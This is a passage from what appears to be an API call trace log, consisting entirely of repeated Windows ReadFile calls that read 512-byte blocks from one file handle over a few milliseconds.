lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: 
lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.936] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, 
lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.937] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.938] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, 
lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.939] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile 
(in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.940] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 
[0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, 
lpOverlapped=0x0) returned 1 [0142.941] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, 
lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.942] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: 
lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.943] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, 
lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.944] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: 